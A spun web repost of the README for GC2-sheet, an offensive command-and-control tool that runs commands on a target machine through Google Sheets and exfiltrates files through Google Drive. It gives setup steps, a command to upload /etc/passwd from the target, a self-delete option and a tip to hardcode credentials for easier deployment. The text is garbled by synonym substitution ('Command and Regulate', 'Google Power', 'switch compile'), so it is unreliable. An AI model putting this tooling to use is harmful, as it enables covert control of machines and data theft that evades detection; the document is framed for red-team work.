Breaking News



GC2 (Google Command and Regulate) is a Command and Regulate software that permits an attacker to execute instructions at the function machine using Google Sheet and exfiltrates knowledge using Google Power.

Why

This program has been complicated as a way to supply a command and keep watch over that doesn’t require any particular get ready (like: a customized space, VPS, CDN, …) everywhere Pink Teaming actions.

Moreover, this system may have interaction most straightforward with Google’s domain names (*.google.com) to make detection tougher.

PS: Please do not add the compiled binary on VirusTotal 🙂

Get ready

  1. Bring together executable

    git clone https://github.com/looCiprian/GC2-sheet
    cd GC2-sheet
    switch compile gc2-sheet.switch
  2. Create a brand new google “provider account”

    Create a brand new google “provider account” using https://console.cloud.google.com/, create a .json key document for the provider account

  3. Permit Google Sheet API and Google Power API

    Permit Google Power API https://builders.google.com/power/api/v3/enable-drive-api and Google Sheet API https://builders.google.com/sheets/api/quickstart/switch

  4. Get ready Google Sheet and Google Power

    Create a brand new Google Sheet and upload the provider account to the editor group of workers of the spreadsheet (so to add the provider account use its e-mail)

     

    Create a brand new Google Power folder and upload the provider account to the editor group of workers of the folder (so to add the provider account use its e-mail)

  5. Get started the C2

    gc2-sheet --key <GCP provider account credential document .JSON > --sheet <Google sheet ID> --drive <Google power ID>

    PS: you’ll be able to additionally hardcode the parameters within the code, so you’re going to add most straightforward the executable at the function machine (check out feedback in root.switch and authentication.switch)

Possible choices

  • Command execution using Google Sheet as a console
  • Obtain knowledge at the function using Google Power
  • Knowledge exfiltration using Google Power
  • Go out

Command execution

This system will carry out a request to the spreedsheet each 5 sec to test if there are some new instructions.
Instructions should be inserted within the column “A”, and the output may also be revealed within the column “B”.

Knowledge exfiltration document

Specific instructions are reserved to accomplish the add and procure to the objective machine

From Serve as to Google Power
add;<a long way off trail>
Instance:
add;/and so on/passwd

Obtain document

Specific instructions are reserved to accomplish the add and procure to the objective machine

From Google Power to Serve as
obtain;<google power document id>;<a long way off trail>
Instance:
obtain;<document ID>;/space/consumer/downloaded.txt

Go out

By way of sending the command pass out, this system will delete itself from the objective and kill its procedure

PS: From os documentation:
If a symlink used to be as soon as once used to start out out the method, relying at the running machine, the end result could be the symlink or the trail it pointed to. On this case the symlink is deleted.

WorkFlow

Demo




Leave a Reply

Your email address will not be published. Required fields are marked *

Donate Us

X